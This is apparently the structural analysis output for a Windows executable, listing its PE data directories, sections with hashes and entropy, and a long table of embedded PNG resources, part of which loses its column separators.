IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56b000 | 0x15cbc4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x65e200 | 0x2f58 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c8000 | 0x4828c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b1bd0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3f7578 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3ad000 | 0x9c8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3abf59 | 0x3ac000 | 398b9f5dbf54c7db778af2e290359ec2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3ad000 | 0x88814 | 0x88a00 | ab24b99083baffb092ae4cfcd44b7050 | False | 0.3208271386093321 | data | 5.109197536267353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x436000 | 0x1345bc | 0x16e00 | 4c6d5a06fe60aeb0032ea6157e4b5d64 | False | 0.12441299521857924 | data | 4.187393367060302 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x56b000 | 0x15cbc4 | 0x15cc00 | ccc8f2d00c82dbda223100ff19e29ecb | False | 0.6405346942204301 | data | 7.439415683359232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c8000 | 0xb5a00 | 0xb5a00 | 6d32cb20453ca8ebf451c8c4c05c85c2 | False | 0.5884350266689607 | data | 6.997997286134788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x57eb84 | 0x77 | PNG image data, 4 x 4, 8-bit/color RGB, non-interlaced | English | United States | 0.9915966386554622
PNG | 0x57ebfc | 0x2f5 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.0145310435931307
PNG | 0x57eef4 | 0x301 | PNG image data, 70 x 31, 8-bit/color RGBA, non-interlaced | English | United States | 1.0143042912873863
PNG | 0x57f1f8 | 0x287 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.017001545595054
PNG | 0x57f480 | 0x36e | PNG image data, 22 x 40, 8-bit/color RGB, non-interlaced | English | United States | 1.0125284738041003
PNG | 0x57f7f0 | 0x15d | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0315186246418337
PNG | 0x57f950 | 0x13e | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0345911949685536
PNG | 0x57fa90 | 0x115 | PNG image data, 30 x 24, 8-bit/color RGB, non-interlaced | English | United States | 1.03971119133574
PNG | 0x57fba8 | 0x12a | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0302013422818792
PNG | 0x57fcd4 | 0x20c | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0209923664122138
PNG | 0x57fee0 | 0xfd | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0276679841897234
PNG | 0x57ffe0 | 0xa6 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0120481927710843
PNG | 0x580088 | 0x7c | PNG image data, 3 x 11, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919354838709677
PNG | 0x580104 | 0x96 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.0133333333333334
PNG | 0x58019c | 0x91 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006896551724138
PNG | 0x580230 | 0x84 | PNG image data, 15 x 3, 8-bit/color RGB, non-interlaced | English | United States | 0.9848484848484849
PNG | 0x5802b4 | 0xa3 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0122699386503067
PNG | 0x580358 | 0x771 | PNG image data, 13 x 156, 8-bit/color RGB, non-interlaced | English | United States | 1.005774278215223
PNG | 0x580acc | 0x697 | PNG image data, 52 x 268, 8-bit/color RGBA, non-interlaced | English | United States | 1.006520450503853
PNG | 0x581164 | 0x342 | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.013189448441247
PNG | 0x5814a8 | 0x45f | PNG image data, 24 x 72, 8-bit/color RGB, non-interlaced | English | United States | 1.0098302055406614
PNG | 0x581908 | 0x1a3 | PNG image data, 20 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.026252983293556
PNG | 0x581aac | 0xac8 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039855072463768
PNG | 0x582574 | 0x37c | PNG image data, 8 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0123318385650224
PNG | 0x5828f0 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667
PNG | 0x583340 | 0x48e | PNG image data, 9 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.009433962264151
PNG | 0x5837d0 | 0xa50 | PNG image data, 24 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0041666666666667
PNG | 0x584220 | 0x380 | PNG image data, 8 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0122767857142858
PNG | 0x5845a0 | 0xab0 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0040204678362572
PNG | 0x585050 | 0xb1f | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038637161924833
PNG | 0x585b70 | 0xa8e | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0040710584752035
PNG | 0x586600 | 0xb30 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.003840782122905
PNG | 0x587130 | 0x3a6 | PNG image data, 48 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.011777301927195
PNG | 0x5874d8 | 0x111b | PNG image data, 38 x 114, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025119890385932
PNG | 0x5885f4 | 0x3d1 | PNG image data, 23 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0112589559877174
PNG | 0x5889c8 | 0x21b | PNG image data, 11 x 88, 8-bit/color RGB, non-interlaced | English | United States | 1.0204081632653061
PNG | 0x588be4 | 0xb12 | PNG image data, 50 x 273, 8-bit/color RGBA, non-interlaced | English | United States | 1.003881439661256
PNG | 0x5896f8 | 0x7ac | PNG image data, 50 x 162, 8-bit/color RGBA, non-interlaced | English | United States | 1.005600814663951
PNG | 0x589ea4 | 0xd43 | PNG image data, 50 x 264, 8-bit/color RGB, non-interlaced | English | United States | 1.003240058910162
PNG | 0x58abe8 | 0x3a4 | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.011802575107296
PNG | 0x58af8c | 0x320 | PNG image data, 14 x 246, 8-bit/color RGBA, non-interlaced | English | United States | 1.01375
PNG | 0x58b2ac | 0x31f | PNG image data, 14 x 246, 8-bit/color RGBA, non-interlaced | English | United States | 1.0137672090112642
PNG | 0x58b5cc | 0x2bd | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0156918687589158
PNG | 0x58b88c | 0x273 | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0175438596491229
                                                                                      PNG0x58bb000x2c9PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0154277699859748
                                                                                      PNG0x58bdcc0x163PNG image data, 70 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112676056338028
                                                                                      PNG0x58bf300x152PNG image data, 41 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032544378698225
                                                                                      PNG0x58c0840x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                      PNG0x58c4100x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x58c9440x19cPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8810679611650486
                                                                                      PNG0x58cae00x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                      PNG0x58ed780x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x58f4180x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8252212389380531
                                                                                      PNG0x58f5dc0x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                      PNG0x58fb000x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                      PNG0x591f780x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5926180x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                      PNG0x5927dc0x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                      PNG0x592ce40x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                      PNG0x5951b80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5958580x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                      PNG0x595a200x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                      PNG0x595f580x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                      PNG0x5984480x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x598ae80x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                      PNG0x598cb00x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                      PNG0x59918c0x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x59b5600x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                      PNG0x59b6ec0x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                      PNG0x59b8a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x59bf480x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                      PNG0x59c10c0x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                      PNG0x59c5fc0x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                      PNG0x59e9a00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                      PNG0x59ea680x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x59f1080x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                      PNG0x59f2c40x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                      PNG0x59f7a80x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                      PNG0x5a1cb80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                      PNG0x5a23580x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                      PNG0x5a251c0x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                      PNG0x5a2a080x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
                                                                                      PNG0x5a4dd00xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                      PNG0x5a4e880x186PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028205128205128
                                                                                      PNG0x5a50100x1b5PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6864988558352403
                                                                                      PNG0x5a51c80x66PNG image data, 1 x 46, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9803921568627451
                                                                                      PNG0x5a52300xf9PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0321285140562249
                                                                                      PNG0x5a532c0x17c3PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.992931119513398
                                                                                      PNG0x5a6af00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                      PNG0x5a6d740x71PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9823008849557522
                                                                                      PNG0x5a6de80x71dPNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0060406370126305
                                                                                      PNG0x5a75080x794PNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0056701030927835
                                                                                      PNG0x5a7c9c0x284PNG image data, 7 x 39, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0170807453416149
                                                                                      PNG0x5a7f200x203PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021359223300971
                                                                                      PNG0x5a81240x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0251716247139588
                                                                                      PNG0x5a82dc0xb2PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.0168539325842696
                                                                                      PNG0x5a83900xd1PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9760765550239234
                                                                                      PNG0x5a84640x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                      PNG0x5a86800x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                      PNG0x5a889c0x1aePNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0186046511627906
                                                                                      PNG0x5a8a4c0x13aPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0222929936305734
                                                                                      PNG0x5a8b880x13fPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0344827586206897
                                                                                      PNG0x5a8cc80x135PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967637540453075
                                                                                      PNG0x5a8e000xdbPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0228310502283104
                                                                                      PNG0x5a8edc0xc6PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0252525252525253
                                                                                      PNG0x5a8fa40x1a9PNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0141176470588236
                                                                                      PNG0x5a91500x19bPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194647201946472
                                                                                      PNG0x5a92ec0x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                      PNG0x5ab5840x13ePNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0345911949685536
                                                                                      PNG0x5ab6c40x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                      PNG0x5ab7dc0x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                      PNG0x5ab8600xcePNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0242718446601942
                                                                                      PNG0x5ab9300xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                      PNG0x5ac4600x25fPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0181219110378912
                                                                                      PNG0x5ac6c00x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                      PNG0x5ac73c0x170PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9755434782608695
                                                                                      PNG0x5ac8ac0x26bPNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0177705977382876
                                                                                      PNG0x5acb180x105PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9731800766283525
                                                                                      PNG0x5acc200xe6PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0260869565217392
                                                                                      PNG0x5acd080x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                      PNG0x5ad0980x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                      PNG0x5ad3000x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                      PNG0x5ad41c0xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                      PNG0x5ad4c80x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x5ad5f40x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                      PNG0x5ad8000xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                      PNG0x5ad8f80xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                      PNG0x5ad9a00x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                      PNG0x5adaf00xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                      PNG0x5adb9c0x89PNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x5adc280x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                      PNG0x5adcc00x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                      PNG0x5add540x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                      PNG0x5addd40xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x5ade7c0xbcPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159574468085106
                                                                                      PNG0x5adf380xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                      PNG0x5ae9400x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                      PNG0x5b07240x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                      PNG0x5b08e40x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x5b0e200x440PNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010110294117647
                                                                                      PNG0x5b12600x12ePNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0298013245033113
                                                                                      PNG0x5b13900x5b1PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0075497597803706
                                                                                      PNG0x5b19440x408PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0106589147286822
                                                                                      PNG0x5b1d4c0x471PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009674582233949
                                                                                      PNG0x5b21c00x4b7PNG image data, 10 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091135045567523
                                                                                      PNG0x5b26780x481PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0095403295750216
                                                                                      PNG0x5b2afc0x3ecPNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0109561752988048
                                                                                      PNG0x5b2ee80x452PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0099457504520795
                                                                                      PNG0x5b333c0x414PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                      PNG0x5b37500x39ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011879049676026
                                                                                      PNG0x5b3af00x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                      PNG0x5b3f800x1b3PNG image data, 15 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.025287356321839
                                                                                      PNG0x5b41340xeaPNG image data, 32 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0299145299145298
                                                                                      PNG0x5b42200x1ae0PNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0015988372093023
                                                                                      PNG0x5b5d000xb43PNG image data, 22 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038154699965314
                                                                                      PNG0x5b68440x609PNG image data, 11 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071197411003237
                                                                                      PNG0x5b6e500x18aePNG image data, 43 x 234, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0017410572966128
                                                                                      PNG0x5b87000x1177PNG image data, 43 x 135, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0024602997092373
                                                                                      PNG0x5b98780x25ecPNG image data, 43 x 330, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011330861145447
                                                                                      PNG0x5bbe640xacbPNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039811798769454
                                                                                      PNG0x5bc9300xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                      PNG0x5bd4f80xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                      PNG0x5be1280x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                      PNG0x5be7080x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                      PNG0x5beca00x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                      PNG0x5bf2980x237PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194003527336861
                                                                                      PNG0x5bf4d00x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                      PNG0x5bfa580x4b6PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091210613598673
                                                                                      PNG0x5bff100x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                      PNG0x5c04440x5fePNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071707953063884
                                                                                      PNG0x5c0a440xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                      PNG0x5c18180x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                      PNG0x5c18940x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                      PNG0x5c2c580x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                      PNG0x5c2fd80x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                      PNG0x5c33700x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                      PNG0x5c45d00x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                      PNG0x5c59840x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                      PNG0x5c5cf00x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                      PNG0x5c60bc0x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                      PNG0x5c73dc0x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                      PNG0x5c87880x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                      PNG0x5c8aec0x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                      PNG0x5c8ea80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                      PNG0x6095980x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                      PNG0x6096b40xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                      PNG0x6097600x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                      PNG0x60988c0x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                      PNG0x609a980xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                      PNG0x609b900xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                      PNG0x609c380x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                      PNG0x609d880xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
                                                                                      PNG0x609e340x8bPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                      PNG0x609ec00x98PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006578947368421
                                                                                      PNG0x609f580x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                      PNG0x609fec0x7dPNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.008
                                                                                      PNG0x60a06c0xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                      PNG0x60a1140xbdPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0105820105820107
                                                                                      PNG0x60a1d40xa07PNG image data, 13 x 156, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004285157771718
                                                                                      PNG0x60abdc0x1de1PNG image data, 52 x 336, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0014380964832004
                                                                                      PNG0x60c9c00x1bePNG image data, 38 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0246636771300448
                                                                                      PNG0x60cb800x53bPNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082150858849888
                                                                                      PNG0x60d0bc0x46cPNG image data, 22 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0097173144876326
                                                                                      PNG0x60d5280xafPNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171428571428571
                                                                                      PNG0x60d5d80x701PNG image data, 23 x 154, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061349693251533
                                                                                      PNG0x60dcdc0x498PNG image data, 9 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0093537414965987
